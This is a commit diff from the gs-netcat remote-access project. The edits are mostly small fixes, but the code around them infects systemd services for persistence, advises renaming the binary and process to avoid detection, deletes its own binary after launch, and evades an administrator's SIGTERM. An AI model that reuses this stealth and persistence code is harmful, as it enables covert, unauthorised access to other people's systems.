_GS_DELME

hackerschoice · Nov 12, 2024 · d5bbded · d5bbded
1 parent 50e7b41
commit d5bbded
Show file tree

Hide file tree

Showing 3 changed files with 16 additions and 12 deletions.
diff --git a/deploy/deploy.sh b/deploy/deploy.sh
@@ -1623,7 +1623,7 @@ install_systemd_infect() {
 	# recover if this fails:
 	do_config2bin "${DSTBIN}" "${bin}" "-liq" "" || return 255
 
-	STARTING_STR="Starting gs-netcat as infected ${CDB}${name}.service${CN}${CDC}${CN}"
+	STARTING_STR="Starting gs-netcat as infected ${CB}${name}.service${CN}${CDC}${CN}"
 }
 
 install_system_systemd()
@@ -2275,6 +2275,6 @@ echo -e "--> ${CW}Join us on Telegram - https://t.me/thcorg${CN}"
 unset is_warn
 [ "$UID" -eq 0 ] && [ -z "$GS_SUPERVISE" ] && is_warn=1
 [ -z "$GS_BIN" ] && is_warn=1
-[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n             Set ${CDC}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
+[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n             Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
 
 exit_code 0
diff --git a/tools/common.h b/tools/common.h
@@ -276,7 +276,7 @@ struct _gopt
 #define GSC_FL_SWD_SURVIVED_SIGTERM  (0x40000) // Admin Tried to SIGTERM us but we 'escaped' by fork'ing.
 
 #ifdef DEBUG
-# define GS_APP_KEEPALIVE        10 // If no activty send app-layer ping (-i needed)
+# define GS_APP_KEEPALIVE        10 // If no activity send app-layer ping (-i needed)
 # define DEBUGSTR                "-DEBUG"
 # define GS_SIGTERM_START_DELAY  10 
 #else
@@ -342,7 +342,7 @@ struct _peer
 	int id;			/* Stats: assign an ID to each pere */
 	struct _socks socks;
 	GS_PKT pkt;		// In-band data for interactive shell (-i)
-	GS_FT ft;       // Filetransfer (-i)
+	GS_FT ft;       // File-transfer (-i)
 	GS_LIST logs;   // Queue for log messages from Server to Client (-i)
 	int is_pending_logs; // Log files need to be send to peer.
 	GS_LIST_ITEM *ids_li;  // Peer is interested in global IDS logs

diff --git a/tools/utils.c b/tools/utils.c
@@ -310,6 +310,11 @@ changeargv0_finish(void) {
 
 	unsetenv("_GS_FS_EXENAME");
 	unsetenv("_GS_PROC_EXENAME");
+
+	if ((ptr = getenv("_GS_DELME"))) {
+		unlink(ptr);
+		unsetenv("_GS_DELME");
+	}
 
 	if (!(gopt.flags & GSC_FL_STARTED_BY_SWD)) {
 		pid_t pid = is_running();
@@ -346,10 +351,6 @@ changeargv0_finish(void) {
 #endif
 	// try_ptraceme();
 	signal(SIGTRAP, SIG_IGN);
-	if ((ptr = getenv("_GS_DELME"))) {
-		unlink(ptr);
-		unsetenv("_GS_DELME");
-	}
 }
 
 static void
@@ -368,12 +369,14 @@ try_changeargv0(int argc, char *argv[]) {
 		return;
 
 	// First check if we called ourself and return immediately.
-	if ((ptr = getenv("_GS_FS_EXENAME"))) {
+	if ((ptr = getenv("_GS_FS_EXENAME")))
 		gopt.prg_exename = strdup(ptr);
-	}
+
 	if ((ptr = getenv("_GS_PROC_EXENAME"))) {
-		if (GSNC_config_read(ptr) != 0)
+		if (GSNC_config_read(ptr) != 0) {
+			changeargv0_finish();
 			exit(0); // CAN NOT HAPPEN. (should have failed in parent already)
+		}
 		goto done;
 	}
 
@@ -1507,6 +1510,7 @@ pty_cmd(GS_CTX *ctx, const char *cmd, pid_t *pidptr, int *err)
 	pid_t pid;
 	int fd = -1;
 	int is_nopty = 0;
+	pid_t gsnc_pid = getpid();
 
 	*err = 0;
 	pid = myforkpty(&fd, NULL, NULL, NULL);
@@ -1662,7 +1666,7 @@ pty_cmd(GS_CTX *ctx, const char *cmd, pid_t *pidptr, int *err)
 
 	if (ptr == NULL) {
 		char procpidexe[64];
-		snprintf(procpidexe, sizeof procpidexe, "/proc/%d/exe", getpid());
+		snprintf(procpidexe, sizeof procpidexe, "/proc/%d/exe", gsnc_pid);
 		if ((fd = open(procpidexe, O_RDONLY)) >= 0) {
 			close(fd);
 			ptr = procpidexe;